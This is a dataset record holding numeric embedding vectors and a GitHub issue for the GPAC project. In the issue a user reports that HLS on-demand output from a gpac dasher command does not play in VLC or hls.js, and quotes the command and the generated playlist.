-0.0032504023984074593, -0.00454180222004652, 0.012889466248452663, -0.020522218197584152, 0.025176163762807846, -0.0042369128204882145, 0.007674804888665676, 0.00044200217234902084, -0.013162815943360329, 0.0060101780109107494, 0.007555652409791946, -0.018980247899889946, 0.024321069940924644, 0.00042294658487662673, 0.014396391808986664, 0.015447734855115414, -0.02694241888821125, -0.0015288280555978417, -0.0005230432143434882, 0.002326972782611847, 0.011999329552054405, 0.0019064354710280895, -0.01013494748622179, 0.0156860388815403, 0.019583018496632576, 0.021307220682501793, -0.01846158504486084, 0.013842684216797352, 0.02687232941389084, 0.016639256849884987, -0.0005414417246356606, 0.017480330541729927, -0.026956437155604362, -0.00145873858127743, -0.009090613573789597, -0.014634695835411549, -0.016162648797035217, 0.0176765825599432, 0.014873000793159008, 0.00671808235347271, -0.01959703490138054, 0.01169794425368309, -0.023003386333584785, 0.0015226952964439988, -0.00657089427113533, -0.012405849061906338, 0.004878231789916754, -0.026732150465250015, 0.015587913803756237, 0.007296320982277393, 0.0013868968235328794, 0.007555652409791946, 0.007394446525722742, -0.0044471812434494495, -0.0038268889766186476, -0.002020331099629402, -0.016330862417817116, -0.004436668008565903, -0.016639256849884987, -0.024391159415245056, -0.01827935129404068, -0.026073308661580086, -0.010513431392610073, -0.01701774075627327, 0.042782656848430634, -0.01690559647977352, 0.012735269963741302, 0.025330359116196632, -0.004482225980609655, 0.0009961476316675544, -0.0027264831587672234, -0.00590854836627841, 0.008915389887988567, -0.005035933572798967, -0.011151245795190334, -0.019386766478419304, 0.004499748349189758, -0.012223616242408752, 0.01756443828344345, 0.002715969691053033, -0.02454535663127899, -0.003995103761553764, 0.01184513233602047, 0.0013360818848013878, -0.007723867427557707, 0.01033820677548647, -0.004790619947016239, -0.012447902001440525, -0.00661645270884037, 0.021517489105463028, -0.007359401788562536, 0.020185787230730057, -0.003104966599494219, -0.036418523639440536, 0.012258660979568958, 0.01157879177480936, -0.015447734855115414, 0.0011223087785765529, 0.003753294935449958, -0.006392166018486023, 0.006784667726606131, 0.012616117484867573, -0.002204315969720483, 0.004408631939440966, 0.016625238582491875, -0.018265334889292717, 0.007864046841859818, -0.008943425491452217, -0.013618397526443005, 0.024797679856419563, 0.012959555722773075, -0.00532330060377717, 0.013085717335343361, 0.005162094719707966, -0.020536234602332115, -0.0010504670208320022, -0.018980247899889946, 0.020368020981550217, -0.01277732290327549, -0.004506757482886314, 0.008494852110743523, -0.008606995455920696, 0.004033653065562248, -0.00254074577242136, 0.00008941892156144604, -0.02683027647435665, 0.0004049861163366586, 0.0007635379442945123, -0.024517321959137917, 0.02357812225818634, 0.022386599332094193, 0.012910493649542332, 0.0005650969105772674, 0.034119587391614914, -0.007436500396579504, -0.001611183281056583, 0.006143348291516304, 0.0007867551175877452, 0.014816928654909134, -0.036054059863090515, -0.0015472265658900142, -0.00854391511529684, 0.005263724364340305, 0.007597706280648708, -0.009686374105513096, 0.014059961773455143, 0.017185956239700317, -0.0165972039103508, -0.00002588658571767155, -0.005056960508227348, 0.0042404173873364925, 0.0018643818330019712, 0.005628190003335476, 0.024853751063346863, 0.0412687212228775, 0.006304554175585508, 0.016344880685210228, 0.014901036396622658, -0.01893819309771061, 0.019877392798662186, -0.0006049603689461946, 0.014396391808986664, -0.013961836695671082, -0.0028438831213861704, 0.0009540938772261143, 0.002090420573949814, -0.027194742113351822, -0.011950266547501087, 0.0062730140052735806, -0.009497133083641529, 0.01769060082733631, -0.017956940457224846, 0.006809198763221502, 0.00508149154484272, -0.006188906263560057, 0.01979328691959381, 0.0014797654002904892, 0.015293537639081478, 0.008459807373583317, 0.0003410294302739203, -0.00583495432510972, 0.00009177349420497194, 0.02399865910410881, -0.0083546731621027, 0.013961836695671082, 0.002719474257901311, 0.005445957183837891, 0.0010723699815571308, -0.00708254799246788, -0.00464343186467886, 0.011803078465163708, -0.008291592821478844, 0.01893819309771061, 0.0027054562233388424, -0.014620678499341011, -0.02471357211470604, -0.01257406361401081, 0.021433381363749504, -0.004429658874869347, -0.004037157632410526, 0.008789228275418282, 0.03103564865887165, 0.004359569400548935, 0.003949545789510012, -0.02140534482896328, 0.04648338258266449, -0.010275126434862614, -0.030502967536449432, -0.0013702504802495241, 0.0010127938585355878, -0.005060464609414339, -0.0027702890802174807, -0.021615615114569664, -0.028736712411046028, 0.009777490980923176, 0.013765585608780384, 0.00920275691896677, 0.004639927763491869, -0.01470478530973196, 0.011088165454566479, -0.02158757857978344, 0.018798014149069786, 0.0016444758512079716, 0.013401119969785213, 0.000016892674466362223, -0.00003904206459992565, 0.006549867335706949, 0.00417733658105135, -0.010709681548178196, 0.0057158018462359905, 0.011613836511969566, -0.012377812527120113, -0.0014701280742883682, -0.006935359910130501, 0.037427812814712524, -0.013618397526443005, -0.006048727314919233, -0.001368498313240707, 0.02663402445614338, 0.008929407224059105, 0.004534793086349964, -0.013884738087654114, 0.01113021932542324, -0.009293872863054276, 0.005025419872254133, 0.0011485923314467072, -0.021265165880322456, 0.011109191924333572, 0.004527784418314695, 0.003578071016818285, -0.008592978119850159, -0.006893306504935026, -0.0018854086520150304, -0.017480330541729927, 0.0022200862877070904, -0.016527114436030388, 0.010499413125216961, 0.00620642863214016, -0.017045775428414345, 0.005600154399871826, 0.013267950154840946, 0.023073475807905197, -0.0004971976741217077, 0.022176330909132957, -0.0045137666165828705, -0.009931688196957111, -0.0031645428389310837, 0.020494181662797928 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi, I tried the following command in order to use HLS protocol for making onDemand streaming: `gpac -r -graph -stats -i video.mp4 -o http://localhost:8000/live.m3u8:gpac:hmode=push:profile=onDemand -no-h2` I implemented a node.js server for storing all segments in a particular folder, but VLC Player and several web player using hls.js are not able to play the video. It looks like that the fragments are not created correctly. You can see the error showed in [hls.js Demo]( https://hlsjs.video-dev.org/demo/) in the attached images. ![HlsDemoErrors](https://user-images.githubusercontent.com/40350337/234860778-fe9d43f0-2c44-41b3-98b8-171594febff4.png) In addition, I observed that m3u8 file was wrong since it shows that there are Indpendent Segments although the command require onDemand profile. According to [Apple HLS Specification](https://developer.apple.com/documentation/http_live_streaming/example_playlists_for_http_live_streaming/video_on_demand_playlist_construction), the content of the m3u8 file should be: `#EXTM3U #EXT-X-PLAYLIST-TYPE:VOD #EXT-X-TARGETDURATION:10 #EXT-X-VERSION:4 #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, http://example.com/movie1/fileSequenceA.ts #EXTINF:10.0, http://example.com/movie1/fileSequenceB.ts #EXTINF:10.0, http://example.com/movie1/fileSequenceC.ts #EXTINF:9.0, http://example.com/movie1/fileSequenceD.ts #EXT-X-ENDLIST` Instead the output generated by the command below is that one `#EXTM3U #EXT-X-VERSION:6 #EXT-X-INDEPENDENT-SEGMENTS #EXT-X-STREAM-INF:BANDWIDTH=534662,CODECS="avc1.4D401F,mp4a.40.2",RESOLUTION=1280x720,FRAME-RATE=25,AUDIO="audio2" live_1.m3u8 #EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio2",NAME="2",LANGUAGE="eng",AUTOSELECT=YES,URI="live_2.m3u8",CHANNELS="2"` Is there something wrong in the command? Software and Used System: - Ubuntu 20.04 - Gpac 2.2 - Firefox 112.0.1
Dasher HLS doesn't play on client side
https://api.github.com/repos/gpac/gpac/issues/2447/comments
5
2023-04-27T12:28:51
2023-04-28T09:00:48Z
https://github.com/gpac/gpac/issues/2447
1,686,750,563
2,447
false
This is a GitHub Issue repo:gpac owner:gpac Title : Dasher HLS doesn't play on client side Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi, I tried the following command in order to use HLS protocol for making onDemand streaming: `gpac -r -graph -stats -i video.mp4 -o http://localhost:8000/live.m3u8:gpac:hmode=push:profile=onDemand -no-h2` I implemented a node.js server for storing all segments in a particular folder, but VLC Player and several web player using hls.js are not able to play the video. It looks like that the fragments are not created correctly. You can see the error showed in [hls.js Demo]( https://hlsjs.video-dev.org/demo/) in the attached images. ![HlsDemoErrors](https://user-images.githubusercontent.com/40350337/234860778-fe9d43f0-2c44-41b3-98b8-171594febff4.png) In addition, I observed that m3u8 file was wrong since it shows that there are Indpendent Segments although the command require onDemand profile. According to [Apple HLS Specification](https://developer.apple.com/documentation/http_live_streaming/example_playlists_for_http_live_streaming/video_on_demand_playlist_construction), the content of the m3u8 file should be: `#EXTM3U #EXT-X-PLAYLIST-TYPE:VOD #EXT-X-TARGETDURATION:10 #EXT-X-VERSION:4 #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, http://example.com/movie1/fileSequenceA.ts #EXTINF:10.0, http://example.com/movie1/fileSequenceB.ts #EXTINF:10.0, http://example.com/movie1/fileSequenceC.ts #EXTINF:9.0, http://example.com/movie1/fileSequenceD.ts #EXT-X-ENDLIST` Instead the output generated by the command below is that one `#EXTM3U #EXT-X-VERSION:6 #EXT-X-INDEPENDENT-SEGMENTS #EXT-X-STREAM-INF:BANDWIDTH=534662,CODECS="avc1.4D401F,mp4a.40.2",RESOLUTION=1280x720,FRAME-RATE=25,AUDIO="audio2" live_1.m3u8 #EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio2",NAME="2",LANGUAGE="eng",AUTOSELECT=YES,URI="live_2.m3u8",CHANNELS="2"` Is there something wrong in the command? Software and Used System: - Ubuntu 20.04 - Gpac 2.2 - Firefox 112.0.1 --- end body ---
2,763
[ -0.03249558061361313, 0.013454018160700798, -0.019124845042824745, 0.003530070884153247, -0.01597522757947445, 0.006954145152121782, -0.031829316169023514, 0.045003198087215424, -0.026044920086860657, 0.045851174741983414, -0.011349225416779518, 0.004205800127238035, 0.0010088620474562049, 0.015051540918648243, -0.004266370087862015, 0.016853485256433487, -0.020896505564451218, 0.019654829055070877, -0.019972819834947586, 0.02789229154586792, 0.01814058981835842, -0.0206390842795372, -0.023273861035704613, 0.04197471961379051, -0.015854088589549065, 0.017958881333470345, -0.009380714036524296, 0.0021672553848475218, -0.029164252802729607, 0.02297101356089115, 0.006337092258036137, 0.021714195609092712, -0.011099375784397125, 0.015028826892375946, 0.048485949635505676, 0.011356796137988567, 0.02858884260058403, 0.04324668273329735, -0.017110906541347504, 0.0014006715500727296, -0.02400069683790207, -0.006003959570080042, -0.02509094960987568, 0.018216300755739212, -0.023183006793260574, 0.021441631019115448, -0.017080621793866158, 0.0009251057053916156, -0.024485252797603607, -0.047728829085826874, 0.007680980022996664, -0.004376152064651251, -0.03146589919924736, -0.037038300186395645, -0.02221389301121235, -0.0521806925535202, 0.08370716124773026, -0.014597268775105476, -0.018640289083123207, 0.02975480630993843, -0.004709284752607346, -0.01331773679703474, -0.008744733408093452, 0.05342236906290054, 0.03809826821088791, 0.03803769871592522, -0.005549687892198563, 0.04115702956914902, -0.0010940380161628127, 0.0030303718522191048, 0.025802642107009888, -0.025121234357357025, 0.015854088589549065, 0.029467102140188217, 0.002297858474776149, -0.06365863233804703, 0.024591250345110893, 0.008669021539390087, 0.0016334858955815434, -0.0035660341382026672, -0.06953387707471848, -0.03054221160709858, -0.05548173561692238, 0.033161845058202744, 0.022168466821312904, 0.0202453825622797, -0.04760769009590149, -0.06717166304588318, -0.011500649154186249, -0.006988215260207653, 0.020533088594675064, 0.015361960045993328, -0.009358000010251999, -0.02898254431784153, -0.0064733740873634815, 0.021093357354402542, -0.03846168518066406, -0.022547027096152306, -0.05084816366434097, -0.025227230042219162, -0.033464692533016205, 0.016868628561496735, -0.008388887159526348, -0.004610859323292971, 0.011523363180458546, -0.0028505558148026466, 0.0350697860121727, -0.026393195614218712, 0.023273861035704613, 0.11665701121091843, 0.035645198076963425, 0.024015838280320168, 0.025651218369603157, -0.020760223269462585, -0.010645103640854359, 0.014309563674032688, -0.026771754026412964, -0.023258719593286514, -0.002110471250489354, 0.01877656951546669, 0.010773814283311367, -0.01567237824201584, -0.01963968761265278, 0.03982450067996979, -0.032435011118650436, 0.04854651913046837, -0.043276965618133545, 0.0007963953539729118, -0.0021880760323256254, -0.015112110413610935, -0.03616004064679146, -0.019881965592503548, -0.020381664857268333, -0.011939778923988342, 0.017580321058630943, 0.014869832433760166, -0.04473063722252846, 0.009494282305240631, 0.005398264154791832, -0.0011905708815902472, -0.02119935303926468, -0.04315582662820816, 0.06868590414524078, -0.004008949268609285, -0.0006927645881660283, -0.014400417916476727, 0.013673583045601845, 0.016323501244187355, -0.04261070117354393, 0.0014129747869446874, -0.017550036311149597, -0.0070336428470909595, -0.020775366574525833, -0.002519316039979458, 0.012765039689838886, 0.019927391782402992, -0.00018253683811053634, -0.03207159414887428, -0.007056356407701969, -0.0003641272778622806, 0.0035073573235422373, 0.0036322821397334337, 0.005201412830501795, -0.020593658089637756, -0.003308613318949938, -0.01542252954095602, -0.014930401928722858, 0.02057851478457451, -0.024182405322790146, 0.011243228800594807, -0.03843139857053757, 0.00741977384313941, 0.01768631860613823, 0.01550581306219101, -0.0444277860224247, -0.032919567078351974, 0.022531883791089058, 0.027241168543696404, -0.01565723679959774, 0.000450722873210907, -0.03301042318344116, -0.009327715262770653, -0.0021596841979771852, 0.025030380114912987, 0.02330414578318596, -0.03052706830203533, 0.04606316611170769, -0.022259321063756943, -0.006715652532875538, -0.02509094960987568, -0.0009038117132149637, 0.034706369042396545, 0.013431305065751076, -0.030360503122210503, 0.004917493090033531, -0.014165710657835007, 0.012091202661395073, -0.05024246871471405, 0.01078895665705204, 0.016005512326955795, 0.0033029350452125072, -0.015763234347105026, 0.0056329709477722645, -0.019745683297514915, -0.025227230042219162, 0.0022618952207267284, 0.007851332426071167, 0.03382810950279236, 0.007086641155183315, -0.04494262859225273, -0.01862514577805996, -0.034070391207933426, 0.04321639612317085, 0.009221718646585941, -0.015361960045993328, 0.00978198740631342, 0.004739569500088692, 0.03858282417058945, -0.03185959905385971, -0.008608452044427395, 0.026378052309155464, -0.013204168528318405, -0.007688551209867001, 0.00685571925714612, -0.04336782172322273, 0.013491874560713768, 0.016686920076608658, -0.013870433904230595, -0.020199954509735107, 0.004936420824378729, 0.014067285694181919, 0.015028826892375946, -0.0039067380130290985, 0.01484711840748787, 0.00974413100630045, 0.033918965607881546, -0.009009725414216518, -0.02221389301121235, -0.027392592281103134, -0.002138863317668438, -0.0249243825674057, -0.01603579707443714, -0.004720641765743494, 0.022789305076003075, -0.01418085303157568, 0.028846263885498047, 0.024742674082517624, 0.001306031597778201, -0.022410744801163673, -0.011197801679372787, -0.0001531984453322366, -0.020381664857268333, 0.004705499392002821, -0.010925238020718098, -0.021305350586771965, 0.032919567078351974, 0.033767540007829666, -0.0012946748174726963, 0.011591503396630287, -0.06638426333665848, 0.004361009690910578, -0.026060061529278755, -0.031223619356751442, -0.01738346926867962, 0.014438274316489697, -0.03473665565252304, 0.0021577912848442793, -0.0006075886194594204, -0.0027672727592289448, -0.008123895153403282, -0.02103278785943985, -0.013953717425465584, -0.03988507017493248, 0.023894699290394783, 0.00011025556887034327, -0.012954318895936012, 0.01270446926355362, -0.03646288812160492, 0.0444277860224247, -0.012878607027232647, -0.012954318895936012, 0.010576963424682617, -0.00436479551717639, 0.02079050801694393, -0.024258118122816086, 0.0013751187361776829, 0.006291665136814117, -0.02595406584441662, -0.026817182078957558, 0.01745918206870556, 0.015944942831993103, 0.021850476041436195, -0.034009817987680435, 0.029406530782580376, -0.007574983406811953, 0.019382266327738762, -0.016081223264336586, 0.028316279873251915, 0.03161732107400894, 0.017277473583817482, -0.025227230042219162, 0.006783793214708567, 0.010879810899496078, -0.015399816446006298, -0.04457921162247658, -0.024666961282491684, -0.0288311205804348, 0.008161750622093678, 0.013643298298120499, 0.01316631305962801, 0.030587637796998024, -0.02469724602997303, -0.012833179906010628, 0.0059131053276360035, -0.012295625172555447, 0.003179902909323573, 0.037583425641059875, 0.008479741401970387, 0.0004450444539543241, -0.0020934361964464188, -0.010274115018546581, -0.012212341651320457, -0.08237463235855103, 0.01503639854490757, 0.013613013550639153, -0.018731143325567245, -0.01445341669023037, -0.02032109536230564, -0.07970956712961197, 0.0299970842897892, -0.006401447579264641, -0.00706771295517683, 0.0079800421372056, -0.008896157145500183, 0.03125390410423279, -0.04118731617927551, -0.04103589057922363, -0.006125099025666714, 0.02943681739270687, 0.014059714041650295, -0.03912794962525368, 0.004292869009077549, 0.012386479414999485, 0.002140756230801344, 0.005224126391112804, -0.011159945279359818, -0.015301390551030636, 0.010372540913522243, 0.061962682753801346, -0.004728212952613831, 0.0010751100489869714, 0.008237463422119617, 0.01774688810110092, 0.0015568275703117251, 0.0097365602850914, -0.011530933901667595, -0.022395603358745575, -0.022789305076003075, -0.005981246009469032, 0.007609053514897823, 0.016384072601795197, -0.028376849368214607, 0.0019136201590299606, 0.03749256953597069, 0.030345359817147255, -0.006908718030899763, -0.03301042318344116, -0.03616004064679146, -0.02827085182070732, -0.025045521557331085, -0.03131447359919548, 0.0030398359522223473, -0.06692938506603241, 0.015301390551030636, -0.05093901604413986, 0.013855291530489922, 0.0010902524227276444, -0.016702061519026756, -0.06353749334812164, 0.005549687892198563, -0.024288402870297432, 0.05242297425866127, 0.0319504551589489, -0.007889187894761562, 0.014703265391290188, 0.037129152566194534, 0.009009725414216518, -0.0017640891019254923, -0.014309563674032688, -0.03570576757192612, 0.002564743161201477, -0.00006000765642966144, -0.019306553527712822, -0.030572496354579926, -0.009426141157746315, -0.00322343735024333, -0.048273954540491104, -0.03546348959207535, 0.010243830271065235, -0.03949136659502983, -0.00560647202655673, 0.007154781837016344, 0.0036303892266005278, 0.030421072617173195, 0.02009395882487297, 0.03794684261083603, -0.017186619341373444, 0.006136455573141575, 0.02368270605802536, 0.0028846263885498047, -0.005969889461994171, -0.026226628571748734, -0.02195647358894348, -0.014589698053896427, 0.010417968034744263, 0.024439826607704163, 0.018292013555765152, 0.025454366579651833, -0.03201102465391159, 0.02718059904873371, 0.012719611637294292, -0.002318679355084896, -0.021608198061585426, -0.0038953812327235937, 0.0016713418299332261, 0.04082389920949936, -0.028149712830781937, 0.014362561516463757, 0.020911647006869316, -0.0025893496349453926, 0.03467608615756035, -0.04524547606706619, -0.02197161503136158, -0.02133563533425331, 0.005481547210365534, 0.0128483222797513, -0.020063674077391624, -0.011122089810669422, 0.010387683287262917, 0.0038215620443224907, -0.04682028666138649, -0.016702061519026756, 0.010546678677201271, 0.021229637786746025, 0.009728988632559776, -0.0233798585832119, -0.06099356710910797, -0.02174448035657406, 0.0005820358055643737, -0.005477761384099722, 0.014438274316489697, 0.0514235757291317, -0.0051597710698843, -0.029739664867520332, -0.036493171006441116, 0.00011256241850787774, -0.03652345761656761, 0.0017347506945952773, 0.03054221160709858, -0.01729261502623558, -0.031435612589120865, 0.015566382557153702, 0.01714119128882885, 0.0035243926104158163, 0.016156936064362526, -0.002464424818754196, -0.016384072601795197, -0.029043113812804222, 0.011546076275408268, -0.010864668525755405, 0.0055004749447107315, 0.0018511578673496842, 0.011311369016766548, 0.02032109536230564, -0.018564576283097267, 0.02462153509259224, -0.015142395161092281, -0.02368270605802536, -0.004701713565737009, -0.046941425651311874, -0.01698976755142212, -0.0194731205701828, 0.06892818212509155, -0.008585738018155098, -0.0010997164063155651, -0.011053948663175106, 0.00615538377314806, -0.010152976028621197, -0.025514936074614525, -0.005076488014310598, 0.016338644549250603, 0.009660848416388035, -0.005776823963969946, 0.010955522768199444, 0.019139988347887993, 0.018398011103272438, 0.03725029155611992, -0.005614043213427067, 0.0012350516626611352, 0.010993379168212414, -0.011440079659223557, 0.0012823715806007385, 0.03170817717909813, -0.005973674822598696, 0.012469762936234474, -0.0030209077522158623, -0.034070391207933426, 0.016247790306806564, -0.051453858613967896, -0.02548465132713318, -0.004879636690020561, -0.03955193608999252, -0.011674786917865276, -0.024258118122816086, 0.0060645295307040215, -0.03099648281931877, -0.022395603358745575, 0.014900117181241512, 0.04503348469734192, 0.006242452654987574, -0.009176291525363922, -0.01698976755142212, -0.02486381307244301, 0.023273861035704613, -0.045760318636894226, 0.009274717420339584, -0.01016054768115282, -0.015581524930894375, 0.01963968761265278, -0.00639009103178978, -0.02742287702858448, -0.007563626393675804, 0.015642093494534492, 0.06147812306880951, -0.01962454430758953, -0.004909921903163195, -0.02366756461560726, 0.03840111568570137, 0.022774161770939827, 0.0023678920697420835, -0.026226628571748734, 0.044276364147663116, -0.025726929306983948, -0.0004173622583039105, -0.029194537550210953, 0.012636329047381878, -0.014688123017549515, 0.000018809694665833376, -0.012560617178678513, -0.020396806299686432, 0.0003144413058180362, -0.014513986185193062, 0.01588437333703041, -0.006723223719745874, -0.009940982796251774, -0.006034244317561388, 0.006431732326745987, 0.0040203058160841465, 0.014233851805329323, 0.002975480630993843, 0.00783618912100792, 0.007934615015983582, 0.018564576283097267, -0.017004908993840218, -0.005201412830501795, -0.0008740001358091831, 0.0033351124729961157, 0.003297256538644433, -0.027074603363871574, 0.030663350597023964, -0.0027634871657937765, -0.022077612578868866, -0.0016173970652744174, -0.0009728989098221064, -0.01636892929673195, -0.0050916303880512714, 0.009600278921425343, -0.002519316039979458, -0.018095161765813828, -0.01861000433564186, 0.02079050801694393, 0.0040203058160841465, -0.0006255701882764697, -0.00926714576780796, -0.01712604984641075, -0.010046979412436485, 0.0037458499427884817, 0.009910698048770428, -0.009569994173943996, -0.009751702658832073, 0.002065044129267335, 0.0021369706373661757, 0.0006118473829701543, -0.015437671914696693, 0.01705033704638481, -0.01620236225426197, -0.010993379168212414, 0.027952861040830612, 0.034161243587732315, -0.009471568278968334, -0.005614043213427067, 0.05820736661553383, -0.035100072622299194, -0.010766242630779743, -0.017428897321224213, 0.02079050801694393, 0.01705033704638481, 0.0048417807556688786, -0.03534235060214996, -0.00801789853721857, -0.0076544806361198425, 0.029239965602755547, 0.05248354375362396, -0.002682096790522337, 0.0010807884391397238, 0.015990369021892548, 0.010819241404533386, 0.0008489205501973629, 0.011591503396630287, 0.016550637781620026, 0.03591776266694069, -0.03479722514748573, 0.032828714698553085, -0.027135172858834267, 0.004031662829220295, 0.0584193617105484, -0.0036228180397301912, -0.035796623677015305, -0.016535496339201927, -0.03479722514748573, -0.0483042411506176, -0.014082428067922592, -0.018837139010429382, -0.011106946505606174, -0.017353184521198273, -0.019927391782402992, 0.026044920086860657, -0.01495311502367258, -0.020911647006869316, -0.009244432672858238, -0.017489466816186905, 0.016792915761470795, -0.019760826602578163, 0.032223016023635864, -0.025454366579651833, 0.013211740180850029, -0.0064733740873634815, 0.03225330263376236, 0.014400417916476727, 0.02836170606315136, -0.003272650297731161, -0.030330218374729156, 0.025908637791872025, 0.019685113802552223, 0.023818988353013992, -0.030087938532233238, 0.01144765131175518, 0.017095765098929405, -0.016641492024064064, 0.0190794188529253, -0.015536097809672356, -0.022713592275977135, 0.01800430752336979, -0.01689891330897808, 0.02344042807817459, 0.009872841648757458, -0.0009355160873383284, 0.005349051207304001, -0.021774765104055405, 0.040945038199424744, 0.006590727716684341, -0.030178794637322426, 0.017504608258605003, -0.0005919730174355209, -0.0008697413140907884, -0.01078895665705204, 0.00475092651322484, -0.0033521477598696947, 0.002121828030794859, 0.007783191278576851, -0.024182405322790146, 0.0005479654064401984, -0.008759875781834126, 0.013461589813232422, -0.026453765109181404, 0.013575157150626183, 0.005398264154791832, 0.019594259560108185, 0.0023830344434827566, -0.006109956651926041, 0.04376152157783508, 0.016156936064362526, 0.02649919129908085, 0.05018189921975136, 0.0009217933402396739, -0.029542813077569008, 0.016550637781620026, -0.004834209568798542, -0.029345961287617683, -0.017625747248530388, -0.038279976695775986, 0.01582380384206772, 0.015096968039870262, -0.024046123027801514, 0.016853485256433487, 0.027301738038659096, -0.001391207566484809, 0.0011735355947166681, -0.023001298308372498, 0.020275667309761047, 0.017247188836336136, 0.038915954530239105, 0.028452560305595398, 0.004258798900991678, 0.018367726355791092, 0.008706877008080482, -0.015218107029795647, -0.0025988135021179914, -0.028104284778237343, 0.020215097814798355, 0.011538505554199219, -0.03334355354309082, -0.015414958819746971, -0.030875343829393387, -0.005659470334649086, -0.004660072270780802, 0.02182019129395485, 0.015687521547079086, -0.009956125169992447, 0.011485506780445576, -0.011970063671469688, -0.042035289108753204, 0.019200557842850685, 0.017201760783791542, -0.03715943917632103, 0.009176291525363922, -0.017792314291000366, 0.006333306897431612, 0.007434916216880083, 0.0342520996928215, -0.004061947576701641, -0.002303536981344223, 0.01861000433564186, -0.024833528324961662, -0.009100579656660557, -0.028997687622904778, -0.015611809678375721, 0.008706877008080482, -0.0003934656851924956, -0.012492476031184196, 0.034464091062545776, 0.025121234357357025, 0.016565781086683273, -0.04660829156637192, -0.0057654669508337975, 0.026544619351625443, 0.035190925002098083, -0.006901146844029427, -0.015581524930894375, -0.018398011103272438, 0.020517945289611816, 0.0032310085371136665, 0.01751975156366825, -0.012727183289825916, -0.024242974817752838, -0.026438621804118156, 0.01122051477432251, -0.01145522203296423, 0.009085437282919884, -0.006882218644022942, -0.011470364406704903, 0.011523363180458546, -0.00055742944823578, -0.027846865355968475, 0.02593892253935337, 0.005333908833563328, -0.02447011135518551, 0.016853485256433487, -0.002861912827938795, -0.007821046747267246, -0.029860803857445717, -0.022653022781014442, -0.04167187213897705, 0.023001298308372498, -0.01697462424635887, -0.025181803852319717, 0.056905120611190796, -0.00211236416362226, 0.0048455665819346905, -0.020275667309761047, 0.01308302953839302, 0.0076393382623791695, 0.040097061544656754, -0.03622061014175415, 0.005424763076007366, -0.014483701437711716, 0.020851077511906624, 0.02781658060848713, -0.012651471421122551, -0.00393323739990592, 0.008623594418168068, -0.013393448665738106, -0.010417968034744263, -0.018398011103272438, -0.005704897455871105, -0.001730018644593656, -0.028074000030755997, -0.01714119128882885, -0.017595462501049042, 0.024803243577480316, 0.004376152064651251, 0.013272309675812721, -0.008373744785785675, -0.03561491519212723, 0.015702664852142334, -0.031889885663986206, 0.02188076078891754, 0.0040051634423434734, -0.026211487129330635, 0.03640231862664223, -0.02928539179265499, 0.015763234347105026, -0.002708595944568515, -0.029239965602755547, 0.010440681129693985, -0.042338136583566666, 0.0052203405648469925, 0.005754110403358936, 0.014339848421514034, 0.00237546325661242, -0.004429150838404894, -0.0012341052060946822, -0.04073304310441017, -0.001891853054985404, -0.05866163969039917, 0.03458523005247116, -0.005023489706218243, 0.014589698053896427, -0.012681756168603897, 0.0024984951596707106, -0.005545902065932751, 0.004455649759620428, -0.004909921903163195, -0.024439826607704163, 0.0014839547220617533, -0.018019450828433037, -0.0005985978059470654, -0.040945038199424744, 0.004444293212145567, 0.03513035550713539, 0.0063295210711658, 0.028134571388363838, 0.03464579954743385, 0.03093591332435608, -0.03116304986178875, 0.005602686200290918, 0.0012274804757907987, 0.02928539179265499, 0.020366521552205086, -0.026771754026412964, 0.0374017171561718, 0.0035414276644587517, -0.03561491519212723, -0.013355592265725136, 0.0021331850439310074, -0.0023565352894365788, 0.004372366704046726, -0.04021820053458214, -0.0335252620279789, 0.012916463427245617, -0.012106345035135746, -0.018216300755739212, 0.006367377005517483, -0.018125446513295174, -0.011803497560322285, 0.016490068286657333, -0.026044920086860657, -0.011273513548076153, -0.02407640777528286, -0.02291044406592846, -0.008517597801983356, 0.01351458765566349, -0.018504006788134575, -0.0030436215456575155, 0.017883168533444405, -0.017580321058630943, 0.006496087647974491, -0.014097570441663265, -0.028694838285446167, 0.005171128083020449, -0.0035830691922456026, -0.01798916608095169, -0.021911045536398888, 0.01605093851685524, -0.015127252787351608, 0.046305444091558456, -0.032828714698553085, -0.020533088594675064, -0.018988564610481262, -0.026150915771722794, -0.005973674822598696, -0.0032802214846014977, 0.020003104582428932, -0.012734754011034966, 0.0012132844422012568, -0.012628757394850254, 0.017504608258605003, 0.005000776145607233, -0.011016092263162136, -0.023395000025629997, 0.009426141157746315, -0.005333908833563328, 0.014476129785180092, -0.0245306808501482, -0.02507580630481243, -0.036886874586343765, -0.012242626398801804, -0.00041404986404813826, 0.013060315512120724, 0.019503405317664146, 0.0037704564165323973, 0.0020101529080420732, -0.004141445271670818, 0.030951056629419327, -0.014937972649931908, -0.009471568278968334, -0.02445496805012226, 0.010894953273236752, -0.024515537545084953, -0.009373142383992672, 0.019109703600406647, 0.012060917913913727, 0.017171476036310196, -0.011682357639074326, 0.026135774329304695, -0.028497988358139992, -0.013022460043430328, 0.004913707263767719, 0.0024947095662355423, -0.04860708862543106, 0.020775366574525833, 0.015763234347105026, -0.00841160025447607, -0.00730242021381855, -0.009471568278968334, 0.02353128232061863, 0.004501076880842447, -0.0014309564139693975, -0.04930363968014717, -0.01522567868232727, -0.002091543283313513, -0.01527110580354929, -0.018594861030578613, 0.003501678816974163, -0.02392498403787613, -0.026529476046562195, -0.02718059904873371, -0.019109703600406647, -0.0017640891019254923, 